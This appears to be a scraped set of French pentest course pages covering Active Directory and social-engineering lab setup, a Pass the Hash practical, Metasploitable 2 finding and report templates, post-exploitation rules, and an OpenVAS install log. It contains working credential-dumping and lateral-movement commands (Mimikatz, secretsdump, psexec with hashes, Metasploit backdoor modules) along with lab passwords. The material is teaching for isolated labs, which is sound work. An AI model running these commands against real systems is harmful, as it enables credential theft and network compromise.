Social-Engineering Attacks → puis quitter (q) 6. Conventions pour les TPs suivants # Variable Valeur exemple Entreprise LabCorp Kali (attaquant) 192.168.56.10 WS01 (victime) 192.168.56.30 Portail factice https://vpn.labcorp.local Victime user1 / Summer2024! Email interne user1@labcorp.local SMTP lab (Mailpit) 192.168.56.10:1025 7. Cadre légal et éthique # Avant tout TP, le binôme doit pouvoir répondre à :\nQuestion Réponse attendue en lab Qui a autorisé la campagne ? « Client fictif LabCorp — lettre de mission fournie » Quel est le périmètre ? VMs 192.168.56.0/24 uniquement Où vont les données capturées ? Fichiers SET locaux — pas d\u0026rsquo;exfiltration Que faire après le TP ? Supprimer les logs, restaurer les snapshots 8. Avant de continuer # Prendre un snapshot de Kali et WS01 (état « lab propre ») Noter les IP réelles et identifiants dans votre carnet de TP 9. Suite de la démarche # Phase actuelle : Mise en place du lab — infrastructure SET opérationnelle.\n[✓] Mise en place → [●] Credential Harvester → [ ] Spear Phishing → [ ] HTA → [ ] QR → [ ] Rapport Étape suivante : Credential Harvester — cloner le portail VPN et capturer les identifiants de user1.\nRéférences :\nSET — TrustedSec MITRE ATT\u0026amp;CK — Initial Access MITRE ATT\u0026amp;CK T1566 — Phishing ","date":"17 June 2026","externalUrl":null,"permalink":"/learning/pentest/social-engineering/get-started/","section":"Learning","summary":"","title":"Get Started","type":"learning"},{"content":"","date":"16 June 2026","externalUrl":null,"permalink":"/series/activedirectory/","section":"Series","summary":"","title":"Activedirectory","type":"series"},{"content":" Pass the Hash # TP du module Active Directory : extraire un hash NTLM, puis s\u0026rsquo;authentifier sur une autre machine du domaine sans connaître le mot de passe en clair.\nPrérequis : lab AD opérationnel — voir Get Started.\nImportant : techniques d\u0026rsquo;attaque réelles, à réaliser uniquement dans le lab isolé décrit dans le get-started.\n1. Rappel — qu\u0026rsquo;est-ce que le Pass the Hash ? # Concept Détail Hash NTLM Empreinte du mot de passe (32 caractères hex), utilisée par Windows pour l\u0026rsquo;authentification NTLM Pass the Hash (PtH) Réutiliser ce hash pour s\u0026rsquo;authentifier sur SMB, WMI, WinRM, etc., sans le mot de passe en clair Prérequis Hash obtenu + compte admin local ou admin de domaine sur la machine cible + service distant ouvert (445, 5985…) Limites à garder en tête :\nImpossible de PtH vers la même machine où tu es déjà connecté en session locale Les comptes locaux Administrator sont filtrés à distance sur les autres machines (sauf RID 500 sur la machine d\u0026rsquo;origine) Credential Guard, LSA Protection et Protected Users durcissent l\u0026rsquo;extraction et la réutilisation 2. Deux approches pour récupérer les hashes # Ce TP propose deux parcours pour l\u0026rsquo;extraction. Les deux mènent à la même phase : Pass the Hash vers une autre machine (section 4).\nOption A — Mimikatz Option B — Impacket secretsdump Où Sur la machine Windows compromise (WS01) Depuis Kali (distant) Prérequis Shell admin ou SeDebugPrivilege sur WS01 Identifiants admin + accès SMB (445) Intérêt pédagogique Comprendre LSASS, mémoire, PtH intégré Approche « attaquant externe » classique Bruit Exécution locale (EDR en prod) Trafic SMB vers la cible 3. Option A — Récupération des hashes avec Mimikatz # 3.1. Accès initial sur WS01 # Connexion RDP ou shell avec un compte disposant de droits admin local :\nlab\\user1 → élévation → admin local Ou accès grey box fourni par le formateur : lab\\administrateur / mot de passe connu.\n3.2. Transférer Mimikatz sur WS01 # Depuis Kali :\n# Télécharger mimikatz depuis GitHub, puis servir le binaire python3 -m http.server 8080 Sur WS01 (PowerShell en administrateur) :\nNew-Item -ItemType Directory -Force -Path C:\\Temp Invoke-WebRequest -Uri http://192.168.56.10:8080/mimikatz.exe -OutFile C:\\Temp\\mimikatz.exe 3.3. Dump des sessions en mémoire # Lancer mimikatz.exe en administrateur :\nmimikatz # privilege::debug mimikatz # token::elevate mimikatz # sekurlsa::logonpasswords Repérer dans la sortie le champ NTLM (32 caractères hex) :\nUser Name : administrateur Domain : LAB NTLM : a1b2c3d4e5f6789012345678abcdef01 Si logonpasswords ne retourne rien : aucune session admin récente en mémoire. Reconnectez-vous en RDP avec lab\\administrateur sur WS01, puis relancez la commande.\n3.4. Autres commandes Mimikatz (selon contexte) # # Hashes locaux (SAM) — nécessite souvent SYSTEM mimikatz # lsadump::sam # Secrets LSA (comptes de service) mimikatz # lsadump::secrets # Comptes domaine en cache (DC injoignable) mimikatz # lsadump::cache Noter le hash NTLM obtenu — il servira pour la section 4.\n4. Option B — Récupération des hashes avec Impacket secretsdump # Toutes les commandes ci-dessous s\u0026rsquo;exécutent depuis Kali.\n4.1. Dump d\u0026rsquo;une machine jointe au domaine (WS01) # Avec des identifiants domaine valides (ex. lab\\user1 élevé admin local, ou lab\\administrateur) :\nimpacket-secretsdump \u0026#39;lab.local/user1:MotDePasse@192.168.56.30\u0026#39; 4.2. Dump complet du domaine depuis le DC (nécessite admin domaine) # # Tous les comptes du domaine (NTDS.dit) impacket-secretsdump \u0026#39;lab.local/administrateur:MotDePasse@192.168.56.20\u0026#39; # Un seul compte impacket-secretsdump \u0026#39;lab.local/administrateur:MotDePasse@192.168.56.20\u0026#39; -just-dc-user administrateur 4.3. Lire la sortie # Format typique :\nlab.local/administrateur:500:aad3b435b51404eeaad3b435b51404ee:HASH_NT_ICI::: Champ Signification 1er hash (aad3b435…) LM (souvent vide / placeholder) 2e hash (HASH_NT_ICI) NTLM — celui utilisé pour le PtH Exporter les variables pour la suite :\nexport HASH=HASH_NT_ICI export USER=administrateur export DOMAIN=lab.local export TARGET=192.168.56.20 5. Pass the Hash — phase commune (après extraction) # Une fois le hash NTLM obtenu (option A ou B), réutilisez-le pour vous authentifier sur une autre machine (typiquement DC01).\n5.1. Impacket — shell distant (depuis Kali) # # PsExec-like (SMB 445) impacket-psexec -hashes :$HASH $DOMAIN/$USER@$TARGET # Commande unique impacket-psexec -hashes :$HASH $DOMAIN/$USER@$TARGET \u0026#39;whoami \u0026amp; hostname\u0026#39; # Alternative WMI impacket-wmiexec -hashes :$HASH $DOMAIN/$USER@$TARGET 5.2. NetExec — test et exécution # # Vérifier l\u0026#39;authentification par hash nxc smb $TARGET -u $USER -H $HASH -d $DOMAIN # Exécuter une commande nxc smb $TARGET -u $USER -H $HASH -d $DOMAIN -x \u0026#39;whoami\u0026#39; 5.3. Mimikatz — PtH intégré (depuis WS01) # Sans repasser par Kali, injecter un processus authentifié avec le hash :\nmimikatz # privilege::debug mimikatz # sekurlsa::pth /user:administrateur /domain:lab.local /ntlm:HASH_NT_ICI /run:cmd.exe Depuis le cmd ouvert :\nwhoami dir \\\\192.168.56.20\\c$ 5.4. Preuve de succès (livrable) # Preuve Commande Identité sur la cible whoami → lab\\administrateur Machine atteinte hostname → DC01 Accès fichiers dir \\\\DC01\\c$ ou listing via shell Impacket 6. Grille de TP # # Tâche Critère de réussite 1 Cartographier le réseau (nmap) Ports 445/5985 identifiés sur DC01 et WS01 2 Extraire un hash NTLM Sortie Mimikatz ou secretsdump documentée 3 Pass the Hash vers DC01 Shell ou whoami admin sur le DC 4 Expliquer le mécanisme NTLM, droits admin, différence hash / mot de passe 5 Proposer 2 mitigations LAPS, tiering, Protected Users, Credential Guard… 7. Suite de la démarche # Phase actuelle : Pass the Hash — extraction NTLM et mouvement latéral vers le DC.\n[✓] Mise en place → [✓] Pass the Hash → [ ] Kerberoasting → [ ] … Étape suivante : Kerberoasting (page à venir) — exploitation des SPN et des tickets Kerberos.\nRéférences :\nMITRE ATT\u0026amp;CK T1550.002 — Pass the Hash Impacket Mimikatz ","date":"16 June 2026","externalUrl":null,"permalink":"/learning/pentest/activedirectory/pass-the-hash/","section":"Learning","summary":"","title":"Pass the Hash","type":"learning"},{"content":" Mise en place du lab — Active Directory # Guide de démarrage pour le module Active Directory du parcours pentest : environnement Windows isolé, domaine lab.local, outils communs. Les techniques d\u0026rsquo;attaque (Pass the Hash, Kerberoasting, etc.) sont traitées dans des pages dédiées, sur la même infrastructure.\nL\u0026rsquo;objectif est de disposer d\u0026rsquo;un lab isolé, reproductible et hors production, réutilisable pour l\u0026rsquo;ensemble des TPs de ce module.\nImportant : ce lab manipule des techniques d\u0026rsquo;attaque réelles. Ne jamais l\u0026rsquo;exposer sur Internet, sur le réseau de l\u0026rsquo;école sans accord, ni sur votre réseau personnel sans isolation. Utiliser uniquement des VMs d\u0026rsquo;évaluation ou des images fournies par le formateur.\n1. Parcours du module # Une fois l\u0026rsquo;infrastructure en place, enchaînez les TPs dans l\u0026rsquo;ordre (ou selon le programme du formateur) :\n# Page Technique Statut 1 Get Started (cette page) Infra AD, outils, tests réseau — 2 Pass the Hash Extraction NTLM + réutilisation du hash Disponible 3 Kerberoasting Extraction et crack des TGS À venir 4 AS-REP Roasting Comptes sans pré-authentification Kerberos À venir 5 DCSync Réplication NTDS depuis le DC À venir Tous ces TPs partagent Kali, DC01 et WS01 décrits ci-dessous. Prenez des snapshots avant chaque exercice pour repartir d\u0026rsquo;un état propre.\n2. Architecture cible du lab # Réseau recommandé : Host-only (VirtualBox) ou LAN segmenté (VMware) — segment 192.168.56.0/24, sans passerelle vers l\u0026rsquo;extérieur pour les VMs Windows.\nConserver un adaptateur NAT sur Kali uniquement pour les mises à jour.\nMachine Rôle IP (exemple) OS Kali Attaquant (Impacket, NetExec, Metasploit, BloodHound…) 192.168.56.10 Kali Linux (VM) DC01 Contrôleur de domaine 192.168.56.20 Windows Server 2019/2022 Eval WS01 Poste utilisateur (compromission initiale) 192.168.56.30 Windows 10/11 Pro Eval Domaine fictif : lab.local\nScénario pédagogique volontairement vulnérable (commun à tous les TPs) :\nCompte domaine lab\\user1 avec mot de passe faible (accès initial grey box ou RDP) Compte lab\\administrateur — administrateur du domaine Même mot de passe admin local sur DC01 et WS01 (réutilisation de credentials) Au moins un compte de service avec SPN pour le futur TP Kerberoasting (ex. svc_sql / ServicePass123!) Windows Defender et pare-feu désactivés sur le segment lab uniquement 3. Téléchargements # VM / outil Source Identifiants par défaut (exemple lab) Kali Linux https://www.kali.org/get-kali/ kali / kali Windows Server Eval https://www.microsoft.com/evalcenter Défini à l\u0026rsquo;installation Windows 10/11 Eval https://www.microsoft.com/evalcenter Défini à l\u0026rsquo;installation Mimikatz https://github.com/gentilkiwi/mimikatz/releases — Impacket Préinstallé sur Kali (impacket-scripts) — Alternative tout-en-un : GOAD (Game of Active Directory) — domaine préconfiguré, déploiement via Vagrant. Utile si vous ne souhaitez pas monter l\u0026rsquo;AD manuellement ; adapter ensuite les IP et noms d\u0026rsquo;hôtes dans les pages du module.\n4. Préparation de l\u0026rsquo;environnement Active Directory # 4.1. Sur DC01 # Installer Windows Server Eval Configurer l\u0026rsquo;IP statique (192.168.56.20, masque 255.255.255.0, pas de passerelle) Renommer la machine en DC01 Installer le rôle Active Directory Domain Services Promouvoir en contrôleur de domaine : domaine lab.local Créer les comptes : administrateur — membre du groupe Domain Admins user1 — utilisateur standard (Préparation Kerberoasting) Créer un compte de service svc_sql et lui associer un SPN : New-ADUser -Name \u0026#34;svc_sql\u0026#34; -SamAccountName \u0026#34;svc_sql\u0026#34; -AccountPassword (ConvertTo-SecureString \u0026#34;ServicePass123!\u0026#34; -AsPlainText -Force) -Enabled $true setspn -A MSSQLSvc/DC01.lab.local:1433 lab\\svc_sql 4.2. Sur WS01 # Installer Windows 10/11 Eval IP statique 192.168.56.30 Joindre le domaine lab.local Se connecter une fois en RDP avec lab\\administrateur (utile pour les TPs nécessitant des credentials en mémoire, ex. Mimikatz) 4.3. Sur Kali — outils communs # sudo apt update sudo apt install -y impacket-scripts netexec evil-winrm bloodhound Outil Usage dans le module Impacket secretsdump, psexec, GetUserSPNs (Kerberoasting) NetExec Auth, exécution distante, énumération SMB Mimikatz Exécuté sur la cible Windows (dump LSASS, PtH) BloodHound Cartographie AD (optionnel, TPs avancés) 5. Test de l\u0026rsquo;environnement # 5.1. Vérifier les IP # Sur chaque VM, noter l\u0026rsquo;adresse réelle (adapter si DHCP) :\n# Windows (DC01, WS01) ipconfig # Kali ip a 5.2. Connectivité depuis Kali # ping -c 2 192.168.56.20 ping -c 2 192.168.56.30 nmap -sV -p 88,389,445,5985,3389 192.168.56.20-30 Port Service Intérêt 88 Kerberos Kerberoasting, AS-REP Roasting 389 LDAP Énumération AD 445 SMB PtH, secretsdump, NetExec 5985 WinRM Shell distant 3389 RDP Accès initial grey box Résultat attendu : DC01 joignable sur 88, 389 et 445 ; WS01 sur 445 (minimum).\nLorsque Kali joint DC01 et WS01, le lab est prêt.\n5.3. Vérifier l\u0026rsquo;authentification domaine # nxc smb 192.168.56.20 -u user1 -p \u0026#39;MotDePasse\u0026#39; -d lab.local Un résultat (Pwn3d!) ou succès d\u0026rsquo;auth confirme que le domaine répond correctement.\n6. Conventions pour les TPs suivants # Les pages du module utilisent les variables et noms ci-dessous — adaptez les IP si votre lab diffère :\nVariable Valeur exemple Domaine lab.local DC 192.168.56.20 / DC01 Workstation 192.168.56.30 / WS01 Kali 192.168.56.10 Admin domaine lab\\administrateur Utilisateur lab\\user1 7. Avant de continuer # Prendre un snapshot de Kali, DC01 et WS01 (état « lab propre ») Noter les IP réelles et les mots de passe du lab dans votre carnet de TP 8. Suite de la démarche # Phase actuelle : Mise en place du lab — infrastructure AD opérationnelle.\n[✓] Mise en place → [●] Pass the Hash → [ ] Kerberoasting → [ ] … Étape suivante : Pass the Hash — extraction de hashes NTLM (Mimikatz ou Impacket) et mouvement latéral.\nRéférences :\nMITRE ATT\u0026amp;CK — Active Directory Impacket GOAD ","date":"16 June 2026","externalUrl":null,"permalink":"/learning/pentest/activedirectory/get-started/","section":"Learning","summary":"","title":"Get Started","type":"learning"},{"content":"","date":"3 June 2026","externalUrl":null,"permalink":"/series/metasploitable2/","section":"Series","summary":"","title":"Metasploitable2","type":"series"},{"content":" Rapport de pentest — référentiel Metasploitable 2 / TechFlow # Document de référence pour le module pentest.\nMission fictive : TechFlow SAS — pentest grey box interne.\nCible lab : 172.16.211.128 · Attaquant : Kali 172.16.211.129 (host-only, segment 172.16.211.0/24).\nPrérequis : Reconnaissance → Scan vulns → Exploitation → Post-exploit → Fiches finding (réseau + web Mutillidae, DVWA, etc.) terminées.\nReconnaissance → Scan vulns → Exploitation (foothold) → Post-exploit minimal → Fiche finding → Rapport 1. Objectif du rapport # Public Attente RSSI / direction Résumé exécutif, risques métier, roadmap Équipe technique Findings reproductibles, priorités correctifs 2. Structure obligatoire # 2.1 Résumé exécutif (5–8 lignes) # Langage non technique — exemple de ton :\nSur la période du test grey box interne, six vulnérabilités majeures ont été identifiées sur le segment lab représentant un serveur legacy TechFlow. Trois permettent un accès système non autorisé (FTP, SMB, web). Recommandation immédiate : isoler le segment, patcher les services exposés et durcir SNMP.\n2.2 Périmètre \u0026amp; méthodologie # Rubrique Contenu type Type de test Grey box interne Périmètre 172.16.211.128 (MS2 = serveur LAN test TechFlow) Hors scope Cloud prod, O365, Wi-Fi entreprise Outils Nmap, OpenVAS, Nessus, Metasploit, Burp (web) Dates Fenêtre lab + horodatages scans RoE Pas d\u0026rsquo;exfiltration réelle, pas de DoS 2.3 Tableau synthèse des findings # ID | Titre | Criticité | Actif | Effort correctif | Priorité roadmap Minimum TP :\n3 findings réseau (recon + exploitation, issus fiches TF-01…) 3 findings web (Mutillidae, DVWA, etc.) 2.4 Matrice risque × effort # Option 3×3 ou liste priorisée :\nEffort faible Effort moyen Effort élevé Risque élevé Patch vsFTPd Segmentation VLAN Remplacement serveur Risque moyen Désactiver Telnet Durcir SNMP — Risque faible bannières — — 2.5 Roadmap correctifs # Horizon Exemples MS2 / TechFlow 30 jours Patch vsFTPd/Samba, désactiver FTP/Telnet, fermer port 1524 90 jours Durcir SNMP, NFS, revue comptes msfadmin 180 jours Retrait MS2 du réseau, WAF dev web, sensibilisation SE 2.6 Annexe technique (optionnelle) # Extraits commandes (recon, MSF) Captures redacted Tableau corrélation scan ↔ exploit 3. Modèle de rapport (squelette Markdown) # # Rapport de test d\u0026#39;intrusion — TechFlow SAS (fictif) **Classification :** Confidentiel — usage pédagogique **Date :** … **Version :** 1.0 ## 1. Résumé exécutif … ## 2. Périmètre et méthodologie ### 2.1 Contexte ### 2.2 Périmètre technique ### 2.3 Méthodologie (PTES simplifié) ### 2.4 Limites ## 3. Synthèse des vulnérabilités | ID | Titre | Criticité | Effort | Délai cible | |----|-------|-----------|--------|-------------| ## 4. Détail des findings ### [TF-01] … (reprendre fiches finding — version courte ou complète) ### [TF-W01] … (web) … ## 5. Matrice risque / effort … ## 6. Roadmap 30 / 90 / 180 jours … ## 7. Annexe … 4. Mapping findings type TechFlow / MS2 # ID suggéré Source Type Criticité typique TF-01 Exploit vsFTPd RCE réseau Critique TF-02 Exploit Samba RCE réseau Critique TF-03 SNMP public (recon/scan) Config Haute TF-04 Telnet clair + creds Accès Haute TF-W01 SQLi Mutillidae Web Critique TF-W02 XSS Mutillidae Web Moyenne TF-W03 OS command / path traversal Web Haute Adapter aux votres fiches réelles — ne pas inventer d’exploit non réalisé.\n5. Résumé exécutif — gabarit phrases # Contexte : type de mission + durée Résultat global : nombre de vulns critiques / hautes Impact principal : accès non autorisé, données Cause racine : services obsolètes, configs par défaut Recommandation clé : action 30 jours Ton : factuel, pas alarmiste gratuit 6. Livrables fichiers # Fichier Rôle rapport-techflow.md ou .pdf Document principal annexe-scans.pdf Exports OpenVAS/Nessus (extraits) fiches/ Copies TF-01…TF-W03 Slide 2 min 1 slide : synthèse + matrice 7. Checklist avant de clôturer le module # 6 findings minimum (3 réseau + 3 web) Chaque finding réseau lié à un exploit ou scan documenté Roadmap 30/90/180 avec actions concrètes MS2 présenté comme segment test, pas « Internet » RoE et limites mentionnés Pas de secrets / hashes complets en clair 8. Liens internes # Fiche finding Scan vulns Reconnaissance Exploitation 9. Suite de la démarche # Phase actuelle : Rapport — livrable final du pentest fictif TechFlow / MS2.\n[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [✓] Exploitation → [✓] Post-exploit → [✓] Findings → [●] Rapport Fin du parcours : toutes les phases du module sont couvertes. Revoir le get started ou finaliser vos livrables avant archivage.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/report/","section":"Learning","summary":"","title":"Report","type":"learning"},{"content":" Fiche finding — référentiel Metasploitable 2 # 1. Rôle de la fiche finding # La fiche de finding détaille chaque Exploitation, du comment jusqu\u0026rsquo;à la preuve d\u0026rsquo;impact.\nÉlément Détail But Documenter une vulnérabilité prouvée (pas seulement détectée par OpenVAS) Quand Après chaque exploit réussi (phase exploitation) Public cible RSSI + équipe technique 2. Modèle standard (à remplir) # ## [TF-XX] Titre court — Service **Criticité :** Critique / Haute / Moyenne (CVSS x.x si pertinent) **Actif :** 192.168.56.102 — nom service / port **Référence :** CVE-XXXX-XXXX (si applicable) ### Description 2–4 phrases : nature de la faille, contexte MS2, lien avec scan OpenVAS/Nessus. ### Reproduction 1. Contexte (depuis Kali 192.168.56.10, grey box interne) 2. Commande ou module MSF (`use`, `set RHOSTS`, `run`) 3. Post-exploit minimal (`id`, `hostname`) 4. Résultat attendu ### Preuve [Screenshot : sortie `id` / session MSF — horodaté] ### Impact (TechFlow fictif) Impact métier : accès shell non autorisé, pivot LAN, données sur serveur test… ### Recommandation Correctif : patch version, désactiver service, segmentation, durcissement… Priorité : immédiat / 30j / 90j 3. Exemple rempli — vsFTPd 2.3.4 (MS2) # ## [TF-01] Backdoor vsFTPd 2.3.4 — FTP **Criticité :** Critique (CVSS ~10.0 contexte lab) **Actif :** 192.168.56.102 — vsftpd / TCP 21 **Référence :** CVE-2011-2523 ### Description Le service FTP vsFTPd 2.3.4 présente une backdoor activée par le login « :) », permettant l\u0026#39;exécution de commandes système. Détecté par OpenVAS et confirmé par exploitation Metasploit sur le segment lab TechFlow. ### Reproduction 1. Depuis Kali (172.16.211.219), vérifier port 21 ouvert (reconnaissance). 2. msfconsole : `use exploit/unix/ftp/vsftpd_234_backdoor`, `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run`. 3. Session obtenue : `id` → uid=0(root). ### Preuve [Capture : sessions -l + id root] ### Impact Un attaquant interne au VLAN test obtient un shell root sur le serveur legacy, permettant lecture de fichiers locaux et pivot vers d\u0026#39;autres actifs du segment. ### Recommandation Mettre à jour vsFTPd hors version 2.3.4 vulnérable ; désactiver FTP clair ; remplacer par SFTP. Priorité : immédiat. 4. Exemple rempli — Samba usermap_script # ## [TF-02] Injection Samba usermap_script — SMB **Criticité :** Critique **Actif :** 192.168.56.102 — Samba / TCP 445 **Référence :** CVE-2007-2447 ### Description Samba mal configuré permet l\u0026#39;exécution de commandes via le mécanisme username map script. Confirmé après scan Nessus (plugin Samba). ### Reproduction 1. `use exploit/multi/samba/usermap_script` 2. `set LHOST 172.16.211.219`, `set RHOSTS 172.16.211.218`, `run` 3. `id` → root. ### Preuve [Capture getuid / id] ### Impact (TechFlow fictif) Compromission complète du serveur fichier de test ; risque de propagation via comptes de service SMB. ### Recommandation Patcher Samba ; restreindre SMB au VLAN management ; désactiver scripts map sur serveurs exposés. Priorité : immédiat. 5. Identifiants \u0026amp; nommage # Convention Exemple ID rapport TF-01 … TF-06 (TechFlow) Titre Service + type faille court Actif Toujours IP lab + port/service Lien scan Mentionner OpenVAS/Nessus dans Description 6. Chaîne documentaire # Tableau recon ──┐ Rapport scan ──┼──► Fiche finding (exploit prouvé) Post-exploit ──┘ │ ▼ Rapport (synthèse) 7. Travail autonome (avant le rapport) # Finaliser 2 fiches réseau (exploits MSF) Esquisser 1 fiche web (Mutillidae) — champs vides OK Vérifier cohérence IDs avec rapport 8. Suite de la démarche # Phase actuelle : Fiches finding — vulnérabilités prouvées documentées (repro, preuve, impact, correctif).\n[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [✓] Exploitation → [✓] Post-exploit → [●] Findings → [ ] Rapport Étape suivante : Rapport — synthèse exécutive, matrice risque × effort et roadmap 30/90/180 jours.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/findings/","section":"Learning","summary":"","title":"Findings","type":"learning"},{"content":" Post-exploitation minimale sur Metasploitable 2 — référentiel # Document de référence pour le module pentest.\nCible lab : 192.168.56.102 · Attaquant : Kali 192.168.56.10 (host-only).\nPrérequis : foothold obtenu (exploitation).\nSuite : fiche finding → rapport.\nReconnaissance → Scan vulns → Exploitation (foothold) → Post-exploit minimal → Fiche finding → Rapport RoE lab : preuves et enum légère uniquement — pas de persistance, pivot ni exfiltration réelle.\n1. Définition « post-exploit minimal » # Comme évoqué dans le module précédent, il est nécessaire de prendre des preuves afin de prouver la bonne compromission du système.\nObjectif Prouver l’impact après foothold (id, utilisateur effectif, hôte) Documenter 3–5 commandes reproductibles Alimenter la fiche finding (section Preuve / Impact) Comprendre le niveau de privilège atteint 2. Matrice autorisé / interdit # Certaines actions son autorisées, d\u0026rsquo;autres sont interdites. Le périmètre du pentest est normalement exhaustif à ce sujet, mais voici quelques exemples parlants :\nAction Autorisé lab cours Outils / commandes Preuve identité Oui id, whoami, hostname Info système Oui uname -a, cat /etc/issue Réseau local VM Oui ip a, ifconfig, route -n Enum processus / users Oui ps aux, cat /etc/passwd (lecture) Meterpreter baseline Oui sysinfo, getuid, getpid Screenshot Oui Meterpreter screenshot, capture terminal Hashdump Oui si root (démo courte) hashdump — ne pas publier hashes complets dans rapport public Upload / download test Oui (fichier témoin) upload / download d’un fichier lab Persistance Non cron, .bashrc, service, port 1524 « re-backdoor » Pivot Non route add, autoroute, scan depuis MS2 vers campus Exfiltration réelle Non BDD clients, /etc/shadow hors sandbox Destruction Non rm -rf, arrêt services 3. Checklist immédiate (après chaque exploit) # Exécuter dans l’ordre et capturer chaque sortie :\n# Shell classique id whoami hostname uname -a ip a || ifconfig # Meterpreter sysinfo getuid getpid Horodatage : noter date/heure dans le carnet de lab.\n4. Meterpreter — commandes utiles (lab) # Voici plusieurs commandes utiles de meterpreter\nsessions -l sessions -i 1 sysinfo getuid shell # shell système interactif — puis id / hostname screenshot # preuve visuelle (optionnel) Commande Usage cours Précaution upload / download Prouver lecture/écriture Fichier non sensible uniquement hashdump Démo si root Masquer dans rapport migrate Comprendre stabilité Optionnel background Gérer plusieurs sessions — 5. Deux exploits = deux jeux de preuves # 2 exploits → 2 checklists distinctes. Chaque exploit a ses preuves, on ne réutilise pas les captures.\nChaque checklist permettra d\u0026rsquo;alimenter la fiche de finding respective.\nExploit 1 (vsFTPd) → id / hostname / sysinfo → Fiche finding #1 Exploit 2 (Samba) → id / hostname / sysinfo → Fiche finding #2 6. Suite de la démarche # Phase actuelle : Post-exploitation minimale — impact prouvé, preuves reproductibles collectées.\n[✓] Mise en place → [✓] Reconnaissance → [✓] Scan vulns → [✓] Exploitation → [●] Post-exploit → [ ] Findings → [ ] Rapport Étape suivante : Findings — rédiger une fiche par exploit réussi.\n","date":"3 June 2026","externalUrl":null,"permalink":"/learning/pentest/metasploitable2/post-exploit/","section":"Learning","summary":"","title":"Post Exploit","type":"learning"},{"content":" Scan de vulnérabilités — Metasploitable 2 # Document de référence pour le module pentest — phase scan de vulnérabilités.\nCible lab : 192.168.56.102 · Attaquant : Kali 192.168.56.10 (host-only).\nPrérequis : Reconnaissance terminée (ports, versions, tableau de corrélation).\nSuite : Exploitation — choisir 2–3 cibles prouvées par le scan, pas au hasard.\nReconnaissance → Scan vulns → Exploitation → Post-exploit → Findings → Rapport RoE lab : scan uniquement sur 192.168.56.102 — pas de scan du réseau campus / Internet.\n1. Recon vs scan de vulnérabilités # Phase Question Outils Livrable Recon Qu’est-ce qui est exposé ? (ports, services, versions) nmap, enum4linux, snmpwalk Cartographie L2–L7 Scan vulns Quelles faiblesses connues ? (CVE, plugins, misconfig) OpenVAS, Nessus, nmap --script vuln Liste priorisée pour exploit Exploit Puis-je en profiter ? (shell, compte) Metasploit, PoC manuels Preuve d’accès Le scan ne remplace pas la recon : il enrichit le tableau recon avec des alertes corrélées (CVE, criticité, recommandation).\n2. Outils — comparaison rapide # Outil Intérêt lab Inconvénient OpenVAS / GVM Gratuit, graphique Scan long, parfois des faux positifs Nmap NSE vuln Rapide, reproductible en CLI Moins exhaustif qu’un scanner dédié searchsploit Vérifier exploit public Manuel, hors scan auto Dans le cadre de cet exercice, tester les différentes méthodes et comparer les résultats.\n3. Scan avec OpenVAS # 3.1 Installation # Mettre à jour la distribution : sudo apt update \u0026amp;\u0026amp; sudo apt upgrade -y Installer l\u0026rsquo;application : sudo apt install gvm -y ┌──(kali㉿kali)-[~] └─$ sudo apt install gvm -y The following packages were automatically installed and are no longer required: enchant-2 libraw23t64 openjdk-21-jre libavc1394-0 libsdl2-classic openjdk-21-jre-headless libgdal38 libsimdutf31 postgresql-common-dev libio-pty-perl libsodium23 python3-pluginbase libipc-run-perl libteamdctl0 python3-pysnmp4 libmbedcrypto16 libunibreak6 python3-tz libpostal-data libxmlsec1-1 libpostal1 libxmlsec1-openssl1 Use \u0026#39;sudo apt autoremove\u0026#39; to remove them. Installing: gvm Installing dependencies: greenbone-security-assistant gsad gvm-tools Summary: Upgrading: 0, Installing: 4, Removing: 0, Not Upgrading: 61 Download size: 2,482 kB Space needed: 15.9 MB / 61.3 GB available Get:1 http://kali.download/kali kali-rolling/non-free amd64 greenbone-security-assistant all 26.17.0-0kali1 [2,176 kB] Get:2 http://kali.download/kali kali-rolling/main amd64 gsad amd64 24.16.0-1 [141 kB] Get:3 http://kali.download/kali kali-rolling/main amd64 gvm all 25.04.3 [12.1 kB] Get:4 http://kali.download/kali kali-rolling/main amd64 gvm-tools all 25.4.6-1 [153 kB] Fetched 2,482 kB in 1s (3,084 kB/s) Selecting previously unselected package greenbone-security-assistant. (Reading database… 435237 files and directories currently installed.) Preparing to unpack …/greenbone-security-assistant_26.17.0-0kali1_all.deb… Unpacking greenbone-security-assistant (26.17.0-0kali1)… Selecting previously unselected package gsad. Preparing to unpack …/gsad_24.16.0-1_amd64.deb… Unpacking gsad (24.16.0-1)… Selecting previously unselected package gvm. Preparing to unpack …/archives/gvm_25.04.3_all.deb… Unpacking gvm (25.04.3)… Selecting previously unselected package gvm-tools. Preparing to unpack …/gvm-tools_25.4.6-1_all.deb… Unpacking gvm-tools (25.4.6-1)… Setting up greenbone-security-assistant (26.17.0-0kali1)… Setting up gsad (24.16.0-1)… gsad.service is a disabled or a static unit, not starting it. Setting up gvm (25.04.3)… Setting up gvm-tools (25.4.6-1)… Processing triggers for man-db (2.13.1-1)… Processing triggers for kali-menu (2026.2.6)… Lancer la configuration : sudo gvm-setup └─$ sudo gvm-setup This script is provided and maintained by Debian and Kali. If you find any issue in this script, please report it directly to Debian or Kali [\u0026gt;] Starting PostgreSQL service [\u0026gt;] Creating GVM\u0026#39;s certificate files [\u0026gt;] Creating PostgreSQL database [*] Creating database user [*] Creating database [*] Creating permissions CREATE ROLE [*] Applying permissions GRANT ROLE [*] Creating extension uuid-ossp CREATE EXTENSION [*] Creating extension pgcrypto CREATE EXTENSION [*] Creating extension pg-gvm CREATE EXTENSION [\u0026gt;] Migrating database [\u0026gt;] Checking for GVM admin user [*] Creating user admin for gvm [*] Please note the generated admin password [*] User created with password \u0026#39;7596e387-4d90-408a-aa5b-88eeaca1f5e4\u0026#39;. [*] Configure Feed Import Owner [*] Define Feed Import Owner [*] Update GVM feeds Running as root. Switching to user \u0026#39;_gvm\u0026#39; and group \u0026#39;_gvm\u0026#39;. Trying to acquire lock on /var/lib/openvas/feed-update.lock Acquired lock on /var/lib/openvas/feed-update.lock ⠼ Downloading Notus files from rsync://feed.community.greenbone.net/community/vulnerability-feed/24.10/vt-da ta/notus/ to /var/lib/notus ⠼ Downloading NASL files from rsync://feed.community.greenbone.net/community/vulnerability-feed/24.10/vt-da ta/nasl/ to /var/lib/openvas/plugins Releasing lock on /var/lib/openvas/feed-update.lock Trying to acquire lock on 